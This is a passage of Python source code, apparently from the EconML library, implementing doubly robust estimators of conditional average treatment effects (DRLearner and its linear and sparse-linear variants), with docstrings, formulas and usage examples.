else:
propensity_score = None
if hasattr(self._model_regression, 'score'):
regression_score = self._model_regression.score(np.hstack([XW, T]), Y, **filtered_kwargs)
else:
regression_score = None
return propensity_score, regression_score
def predict(self, Y, T, X=None, W=None, *, sample_weight=None, groups=None):
XW = self._combine(X, W)
propensities = np.maximum(self._model_propensity.predict_proba(XW), self._min_propensity)
n = T.shape[0]
Y_pred = np.zeros((T.shape[0], T.shape[1] + 1))
T_counter = np.zeros(T.shape)
Y_pred[:, 0] = self._model_regression.predict(np.hstack([XW, T_counter])).reshape(n)
Y_pred[:, 0] += (Y.reshape(n) - Y_pred[:, 0]) * np.all(T == 0, axis=1) / propensities[:, 0]
for t in np.arange(T.shape[1]):
T_counter = np.zeros(T.shape)
T_counter[:, t] = 1
Y_pred[:, t + 1] = self._model_regression.predict(np.hstack([XW, T_counter])).reshape(n)
Y_pred[:, t + 1] += (Y.reshape(n) - Y_pred[:, t + 1]) * (T[:, t] == 1) / propensities[:, t + 1]
T_complete = np.hstack(((np.all(T == 0, axis=1) * 1).reshape(-1, 1), T))
propensities_weight = np.sum(propensities * T_complete, axis=1)
return Y_pred.reshape(Y.shape + (T.shape[1] + 1,)), propensities_weight.reshape((n,))
class _ModelFinal:
# Coding Remark: The reasoning around the multitask_model_final could have been simplified if
# we simply wrapped the model_final with a MultiOutputRegressor. However, because we also want
# to allow even for model_final objects whose fit(X, y) can accept X=None
# (e.g. the StatsModelsLinearRegression), we cannot take that route, because the MultiOutputRegressor
# checks that X is 2D array.
def __init__(self, model_final, featurizer, multitask_model_final):
self._model_final = clone(model_final, safe=False)
self._featurizer = clone(featurizer, safe=False)
self._multitask_model_final = multitask_model_final
return
def fit(self, Y, T, X=None, W=None, *, nuisances,
sample_weight=None, freq_weight=None, sample_var=None, groups=None):
Y_pred, propensities = nuisances
self.d_y = Y_pred.shape[1:-1] # track whether there's a Y dimension (must be a singleton)
self.d_t = Y_pred.shape[-1] - 1 # track # of treatment (exclude baseline treatment)
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.fit_transform(X)
if self._multitask_model_final:
ys = Y_pred[..., 1:] - Y_pred[..., [0]] # subtract control results from each other arm
if self.d_y: # need to squeeze out singleton so that we fit on 2D array
ys = ys.squeeze(1)
weighted_sample_var = np.tile((sample_var / propensities**2).reshape((-1, 1)),
self.d_t) if sample_var is not None else None
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight,
freq_weight=freq_weight, sample_var=weighted_sample_var)
self.model_cate = self._model_final.fit(X, ys, **filtered_kwargs)
else:
weighted_sample_var = sample_var / propensities**2 if sample_var is not None else None
filtered_kwargs = filter_none_kwargs(sample_weight=sample_weight,
freq_weight=freq_weight, sample_var=weighted_sample_var)
self.models_cate = [clone(self._model_final, safe=False).fit(X, Y_pred[..., t] - Y_pred[..., 0],
**filtered_kwargs)
for t in np.arange(1, Y_pred.shape[-1])]
return self
def predict(self, X=None):
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.transform(X)
if self._multitask_model_final:
pred = self.model_cate.predict(X).reshape((-1, self.d_t))
if self.d_y: # need to reintroduce singleton Y dimension
return pred[:, np.newaxis, :]
return pred
else:
preds = np.array([mdl.predict(X).reshape((-1,) + self.d_y) for mdl in self.models_cate])
return np.moveaxis(preds, 0, -1) # move treatment dim to end
def score(self, Y, T, X=None, W=None, *, nuisances, sample_weight=None, groups=None):
if (X is not None) and (self._featurizer is not None):
X = self._featurizer.transform(X)
Y_pred, _ = nuisances
if self._multitask_model_final:
Y_pred_diff = Y_pred[..., 1:] - Y_pred[..., [0]]
cate_pred = self.model_cate.predict(X).reshape((-1, self.d_t))
if self.d_y:
cate_pred = cate_pred[:, np.newaxis, :]
return np.mean(np.average((Y_pred_diff - cate_pred)**2, weights=sample_weight, axis=0))
else:
scores = []
for t in np.arange(1, Y_pred.shape[-1]):
# since we only allow single dimensional y, we could flatten the prediction
Y_pred_diff = (Y_pred[..., t] - Y_pred[..., 0]).flatten()
cate_pred = self.models_cate[t - 1].predict(X).flatten()
score = np.average((Y_pred_diff - cate_pred)**2, weights=sample_weight, axis=0)
scores.append(score)
return np.mean(scores)
class DRLearner(_OrthoLearner):
"""
CATE estimator that uses doubly-robust correction techniques to account for
covariate shift (selection bias) between the treatment arms. The estimator is a special
case of an :class:`._OrthoLearner` estimator, so it follows the two
stage process, where a set of nuisance functions are estimated in the first stage in a crossfitting
manner and a final stage estimates the CATE model. See the documentation of
:class:`._OrthoLearner` for a description of this two stage process.
In this estimator, the CATE is estimated by using the following estimating equations. If we let:
.. math ::
Y_{i, t}^{DR} = E[Y | X_i, W_i, T_i=t]\
+ \\frac{Y_i - E[Y | X_i, W_i, T_i=t]}{Pr[T_i=t | X_i, W_i]} \\cdot 1\\{T_i=t\\}
Then the following estimating equation holds:
.. math ::
E\\left[Y_{i, t}^{DR} - Y_{i, 0}^{DR} | X_i\\right] = \\theta_t(X_i)
Thus if we estimate the nuisance functions :math:`h(X, W, T) = E[Y | X, W, T]` and
:math:`p_t(X, W)=Pr[T=t | X, W]` in the first stage, we can estimate the final stage cate for each
treatment t, by running a regression, regressing :math:`Y_{i, t}^{DR} - Y_{i, 0}^{DR}` on :math:`X_i`.
The problem of estimating the nuisance function :math:`p` is a simple multi-class classification
problem of predicting the label :math:`T` from :math:`X, W`. The :class:`.DRLearner`
class takes as input the parameter ``model_propensity``, which is an arbitrary scikit-learn
classifier, that is internally used to solve this classification problem.
The second nuisance function :math:`h` is a simple regression problem and the :class:`.DRLearner`
class takes as input the parameter ``model_regressor``, which is an arbitrary scikit-learn regressor that
is internally used to solve this regression problem.
The final stage is multi-task regression problem with outcomes the labels :math:`Y_{i, t}^{DR} - Y_{i, 0}^{DR}`
for each non-baseline treatment t. The :class:`.DRLearner` takes as input parameter
``model_final``, which is any scikit-learn regressor that is internally used to solve this multi-task
regresion problem. If the parameter ``multitask_model_final`` is False, then this model is assumed
to be a mono-task regressor, and separate clones of it are used to solve each regression target
separately.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
If 'auto' :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
model_final :
estimator for the final cate model. Trained on regressing the doubly robust potential outcomes
on (features X).
- If X is None, then the fit method of model_final should be able to handle X=None.
- If featurizer is not None and X is not None, then it is trained on the outcome of
featurizer.fit_transform(X).
- If multitask_model_final is True, then this model must support multitasking
and it is trained by regressing all doubly robust target outcomes on (featurized) features simultanteously.
- The output of the predict(X) of the trained model will contain the CATEs for each treatment compared to
baseline treatment (lexicographically smallest). If multitask_model_final is False, it is assumed to be a
mono-task model and a separate clone of the model is trained for each outcome. Then predict(X) of the t-th
clone will be the CATE of the t-th lexicographically ordered treatment compared to the baseline.
multitask_model_final : bool, optional, default False
Whether the model_final should be treated as a multi-task model. See description of model_final.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (default is 2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
sigma = 0.001
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(0, sigma, size=(1000,))
est = DRLearner()
est.fit(y, T, X=X, W=None)
>>> est.const_marginal_effect(X[:2])
array([[0.511640..., 1.144004...],
[0.378140..., 0.613143...]])
>>> est.effect(X[:2], T0=0, T1=1)
array([0.511640..., 0.378140...])
>>> est.score_
5.11238581...
>>> est.score(y, T, X=X)
5.78673506...
>>> est.model_cate(T=1).coef_
array([0.434910..., 0.010226..., 0.047913...])
>>> est.model_cate(T=2).coef_
array([ 0.863723..., 0.086946..., -0.022288...])
>>> est.cate_feature_names()
['X0', 'X1', 'X2']
>>> [mdl.coef_ for mdls in est.models_regression for mdl in mdls]
[array([ 1.472..., 0.001..., -0.011..., 0.698..., 2.049...]),
array([ 1.455..., -0.002..., 0.005..., 0.677..., 1.998...])]
>>> [mdl.coef_ for mdls in est.models_propensity for mdl in mdls]
[array([[-0.747..., 0.153..., -0.018...],
[ 0.083..., -0.110..., -0.076...],
[ 0.663..., -0.043... , 0.094...]]),
array([[-1.048..., 0.000..., 0.032...],
[ 0.019..., 0.124..., -0.081...],
[ 1.029..., -0.124..., 0.049...]])]
Beyond default models:
.. testcode::
from sklearn.linear_model import LassoCV
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from econml.dr import DRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
sigma = 0.01
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(0, sigma, size=(1000,))
est = DRLearner(model_propensity=RandomForestClassifier(n_estimators=100, min_samples_leaf=10),
model_regression=RandomForestRegressor(n_estimators=100, min_samples_leaf=10),
model_final=LassoCV(cv=3),
featurizer=None)
est.fit(y, T, X=X, W=None)
>>> est.score_
1.7...
>>> est.const_marginal_effect(X[:3])
array([[0.68..., 1.10...],
[0.56..., 0.79...],
[0.34..., 0.10...]])
>>> est.model_cate(T=2).coef_
array([0.74..., 0. , 0. ])
>>> est.model_cate(T=2).intercept_
1.9...
>>> est.model_cate(T=1).coef_
array([0.24..., 0.00..., 0. ])
>>> est.model_cate(T=1).intercept_
0.94...
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
model_final=StatsModelsLinearRegression(),
multitask_model_final=False,
featurizer=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.model_propensity = clone(model_propensity, safe=False)
self.model_regression = clone(model_regression, safe=False)
self.model_final = clone(model_final, safe=False)
self.multitask_model_final = multitask_model_final
self.featurizer = clone(featurizer, safe=False)
self.min_propensity = min_propensity
super().__init__(cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
discrete_treatment=True,
discrete_instrument=False, # no instrument, so doesn't matter
categories=categories,
random_state=random_state)
def _get_inference_options(self):
options = super()._get_inference_options()
if not self.multitask_model_final:
options.update(auto=GenericModelFinalInferenceDiscrete)
else:
options.update(auto=lambda: None)
return options
def _gen_ortho_learner_model_nuisance(self):
if self.model_propensity == 'auto':
model_propensity = LogisticRegressionCV(cv=3, solver='lbfgs', multi_class='auto',
random_state=self.random_state)
else:
model_propensity = clone(self.model_propensity, safe=False)
if self.model_regression == 'auto':
model_regression = WeightedLassoCVWrapper(cv=3, random_state=self.random_state)
else:
model_regression = clone(self.model_regression, safe=False)
return _ModelNuisance(model_propensity, model_regression, self.min_propensity)
def _gen_featurizer(self):
return clone(self.featurizer, safe=False)
def _gen_model_final(self):
return clone(self.model_final, safe=False)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), self.multitask_model_final)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, freq_weight=None, sample_var=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like, default None
Individual weights for each sample. If None, it assumes equal weight.
freq_weight: (n,) array like of integers, default None
Weight for the observation. Observation i is treated as the mean
outcome of freq_weight[i] independent observations.
When ``sample_var`` is not None, this should be provided.
sample_var : (n,) nd array like, default None
Variance of the outcome(s) of the original freq_weight[i] observations that were used to
compute the mean outcome represented by observation i.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`).
Returns
-------
self: DRLearner instance
"""
# Replacing fit from _OrthoLearner, to enforce Z=None and improve the docstring
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, freq_weight=freq_weight, sample_var=sample_var, groups=groups,
cache_values=cache_values, inference=inference)
def refit_final(self, *, inference='auto'):
return super().refit_final(inference=inference)
refit_final.__doc__ = _OrthoLearner.refit_final.__doc__
def score(self, Y, T, X=None, W=None, sample_weight=None):
"""
Score the fitted CATE model on a new data set. Generates nuisance parameters
for the new data set based on the fitted residual nuisance models created at fit time.
It uses the mean prediction of the models fitted by the different crossfit folds.
Then calculates the MSE of the final residual Y on residual T regression.
If model_final does not have a score method, then it raises an :exc:`.AttributeError`
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight: optional(n,) vector or None (Default=None)
Weights for each samples
Returns
-------
score: float
The MSE of the final CATE model on the new data.
"""
# Replacing score from _OrthoLearner, to enforce Z=None and improve the docstring
return super().score(Y, T, X=X, W=W, sample_weight=sample_weight)
@property
def multitask_model_cate(self):
"""
Get the fitted final CATE model.
Returns
-------
multitask_model_cate: object of type(`model_final`)
            An instance of the model_final object that was fitted after calling fit, whose
            vector of outcomes corresponds to the CATE model for each treatment, compared to baseline.
Available only when multitask_model_final=True.
"""
if not self.ortho_learner_model_final_._multitask_model_final:
raise AttributeError("Separate CATE models were fitted for each treatment! Use model_cate.")
return self.ortho_learner_model_final_.model_cate
def model_cate(self, T=1):
"""
Get the fitted final CATE model.
Parameters
----------
T: alphanumeric
The treatment with respect to which we want the fitted CATE model.
Returns
-------
model_cate: object of type(model_final)
An instance of the model_final object that was fitted after calling fit which corresponds
to the CATE model for treatment T=t, compared to baseline. Available when multitask_model_final=False.
"""
if self.ortho_learner_model_final_._multitask_model_final:
raise AttributeError("A single multitask model was fitted for all treatments! Use multitask_model_cate.")
_, T = self._expand_treatments(None, T)
ind = inverse_onehot(T).item() - 1
assert ind >= 0, "No model was fitted for the control"
return self.ortho_learner_model_final_.models_cate[ind]
@property
def models_propensity(self):
"""
Get the fitted propensity models.
Returns
-------
models_propensity: nested list of objects of type(`model_propensity`)
            A nested list of instances of the `model_propensity` object. The number of sublists equals the
            number of monte carlo iterations; each element in a sublist corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [[mdl._model_propensity for mdl in mdls] for mdls in super().models_nuisance_]
@property
def models_regression(self):
"""
Get the fitted regression models.
Returns
-------
model_regression: nested list of objects of type(`model_regression`)
            A nested list of instances of the model_regression object. The number of sublists equals the
            number of monte carlo iterations; each element in a sublist corresponds to a crossfitting
fold and is the model instance that was fitted for that training fold.
"""
return [[mdl._model_regression for mdl in mdls] for mdls in super().models_nuisance_]
@property
def nuisance_scores_propensity(self):
"""Gets the score for the propensity model on out-of-sample training data"""
return self.nuisance_scores_[0]
@property
def nuisance_scores_regression(self):
"""Gets the score for the regression model on out-of-sample training data"""
return self.nuisance_scores_[1]
@property
def featurizer_(self):
"""
Get the fitted featurizer.
Returns
-------
featurizer: object of type(`featurizer`)
An instance of the fitted featurizer that was used to preprocess X in the final CATE model training.
Available only when featurizer is not None and X is not None.
"""
return self.ortho_learner_model_final_._featurizer
def cate_feature_names(self, feature_names=None):
"""
Get the output feature names.
Parameters
----------
feature_names: list of strings of length X.shape[1] or None
The names of the input features. If None and X is a dataframe, it defaults to the column names
from the dataframe.
Returns
-------
out_feature_names: list of strings or None
The names of the output features :math:`\\phi(X)`, i.e. the features with respect to which the
final CATE model for each treatment is linear. It is the names of the features that are associated
with each entry of the :meth:`coef_` parameter. Available only when the featurizer is not None and has
a method: `get_feature_names(feature_names)`. Otherwise None is returned.
"""
if self._d_x is None:
# Handles the corner case when X=None but featurizer might be not None
return None
if feature_names is None:
feature_names = self._input_names["feature_names"]
if self.featurizer_ is None:
return feature_names
return get_feature_names_or_default(self.featurizer_, feature_names)
@property
def model_final_(self):
return self.ortho_learner_model_final_._model_final
@property
def fitted_models_final(self):
return self.ortho_learner_model_final_.models_cate
def shap_values(self, X, *, feature_names=None, treatment_names=None, output_names=None, background_samples=100):
if self.ortho_learner_model_final_._multitask_model_final:
return _shap_explain_multitask_model_cate(self.const_marginal_effect, self.multitask_model_cate, X,
self._d_t, self._d_y,
featurizer=self.featurizer_,
feature_names=feature_names,
treatment_names=treatment_names,
output_names=output_names,
input_names=self._input_names,
background_samples=background_samples)
else:
return _shap_explain_model_cate(self.const_marginal_effect, self.fitted_models_final,
X, self._d_t, self._d_y,
featurizer=self.featurizer_,
feature_names=feature_names,
treatment_names=treatment_names,
output_names=output_names,
input_names=self._input_names,
background_samples=background_samples)
shap_values.__doc__ = LinearCateEstimator.shap_values.__doc__
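# Editor's sketch (an addition, not part of the original API): the two accessors
# above are mutually exclusive, so a small helper can pick the right one for a
# fitted DRLearner `est`; `t` names a non-baseline treatment value.
def _final_cate_model_for(est, t=1):
    if est.multitask_model_final:
        # A single multitask model covers all treatments.
        return est.multitask_model_cate
    # Otherwise one model was fitted per treatment, relative to the baseline.
    return est.model_cate(T=t)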
class LinearDRLearner(StatsModelsCateEstimatorDiscreteMixin, DRLearner):
"""
Special case of the :class:`.DRLearner` where the final stage
is a Linear Regression on a low dimensional set of features. In this case, inference
can be performed via the asymptotic normal characterization of the estimated parameters.
This is computationally faster than bootstrap inference. To do this, just leave the setting ``inference='auto'``
unchanged, or explicitly set ``inference='statsmodels'`` or alter the covariance type calculation via
    ``inference=StatsModelsInferenceDiscrete(cov_type='HC1')``.
More concretely, this estimator assumes that the final cate model for each treatment takes a linear form:
.. math ::
\\theta_t(X) = \\left\\langle \\theta_t, \\phi(X) \\right\\rangle + \\beta_t
    where :math:`\\phi(X)` is the output features of the featurizer, or `X` if featurizer is None. :math:`\\beta_t`
    is an intercept of the CATE, which is included if ``fit_cate_intercept=True`` (Default). It fits this by
    running an ordinary least squares (OLS) regression, regressing the doubly robust outcome differences on X:
.. math ::
\\min_{\\theta_t, \\beta_t}\
E_n\\left[\\left(Y_{i, t}^{DR} - Y_{i, 0}^{DR}\
- \\left\\langle \\theta_t, \\phi(X_i) \\right\\rangle - \\beta_t\\right)^2\\right]
    Then inference can be performed via standard approaches for inference of OLS, via asymptotic normal approximations
    of the estimated parameters. The default covariance estimator used is heteroskedasticity robust (HC1).
    For other methods see :class:`.StatsModelsInferenceDiscrete`. You can invoke them by setting:
``inference=StatsModelsInferenceDiscrete(cov_type=...)``.
This approach is valid even if the CATE model is not linear in :math:`\\phi(X)`. In this case it performs
inference on the best linear approximation of the CATE model.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
        If 'auto', :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (default is 2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner, LinearDRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(size=(1000,))
est = LinearDRLearner()
est.fit(y, T, X=X, W=None)
>>> est.effect(X[:3])
array([ 0.409743..., 0.312604..., -0.127394...])
>>> est.effect_interval(X[:3])
(array([ 0.065306..., -0.182074..., -0.765901...]), array([0.754180..., 0.807284..., 0.511113...]))
>>> est.coef_(T=1)
array([ 0.450779..., -0.003214... , 0.063884... ])
>>> est.coef__interval(T=1)
(array([ 0.155111..., -0.246272..., -0.136827...]), array([0.746447..., 0.239844..., 0.264595...]))
>>> est.intercept_(T=1)
0.88425066...
>>> est.intercept__interval(T=1)
(0.64868548..., 1.11981585...)
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
featurizer=None,
fit_cate_intercept=True,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
super().__init__(model_propensity=model_propensity,
model_regression=model_regression,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return StatsModelsLinearRegression(fit_intercept=self.fit_cate_intercept)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, freq_weight=None, sample_var=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like, default None
Individual weights for each sample. If None, it assumes equal weight.
freq_weight: (n,) array like of integers, default None
Weight for the observation. Observation i is treated as the mean
outcome of freq_weight[i] independent observations.
When ``sample_var`` is not None, this should be provided.
sample_var : (n,) nd array like, default None
Variance of the outcome(s) of the original freq_weight[i] observations that were used to
compute the mean outcome represented by observation i.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports ``'bootstrap'``
(or an instance of :class:`.BootstrapInference`) and ``'statsmodels'``
(or an instance of :class:`.StatsModelsInferenceDiscrete`).
Returns
-------
self: DRLearner instance
"""
# Replacing fit from DRLearner, to add statsmodels inference in docstring
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, freq_weight=freq_weight, sample_var=sample_var, groups=groups,
cache_values=cache_values, inference=inference)
@property
def fit_cate_intercept_(self):
return self.model_final_.fit_intercept
@property
def multitask_model_cate(self):
        # Replacing this property, which is invalid for this class, so that the
        # docstring is empty and does not appear in the docs.
return super().multitask_model_cate
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!")
class SparseLinearDRLearner(DebiasedLassoCateEstimatorDiscreteMixin, DRLearner):
"""
Special case of the :class:`.DRLearner` where the final stage
is a Debiased Lasso Regression. In this case, inference can be performed via the debiased lasso approach
and its asymptotic normal characterization of the estimated parameters. This is computationally
faster than bootstrap inference. Leave the default ``inference='auto'`` unchanged, or explicitly set
``inference='debiasedlasso'`` at fit time to enable inference via asymptotic normality.
More concretely, this estimator assumes that the final cate model for each treatment takes a linear form:
.. math ::
\\theta_t(X) = \\left\\langle \\theta_t, \\phi(X) \\right\\rangle + \\beta_t
    where :math:`\\phi(X)` is the output features of the featurizer, or `X` if featurizer is None. :math:`\\beta_t`
    is an intercept of the CATE, which is included if ``fit_cate_intercept=True`` (Default). It fits this by
running a debiased lasso regression (i.e. :math:`\\ell_1`-penalized regression with debiasing),
regressing the doubly robust outcome differences on X: i.e. first solves the penalized square loss problem
.. math ::
\\min_{\\theta_t, \\beta_t}\
E_n\\left[\\left(Y_{i, t}^{DR} - Y_{i, 0}^{DR}\
- \\left\\langle \\theta_t, \\phi(X_i) \\right\\rangle - \\beta_t\\right)^2\\right]\
+ \\lambda \\left\\lVert \\theta_t \\right\\rVert_1
and then adds a debiasing correction to the solution. If alpha='auto' (recommended), then the penalty
weight :math:`\\lambda` is set optimally via cross-validation.
This approach is valid even if the CATE model is not linear in :math:`\\phi(X)`. In this case it performs
inference on the best sparse linear approximation of the CATE model.
Parameters
----------
model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
where T is a shape (n, ) array.
If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
model_regression : scikit-learn regressor or 'auto', optional (default='auto')
Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
`predict` methods. If different models per treatment arm are desired, see the
:class:`.MultiModelWrapper` helper class.
        If 'auto', :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
featurizer : :term:`transformer`, optional, default None
Must support fit_transform and transform. Used to create composite features in the final CATE regression.
It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
If featurizer=None, then CATE is trained on X.
fit_cate_intercept : bool, optional, default True
Whether the linear CATE model should have a constant term.
    alpha: string | float, optional, default 'auto'
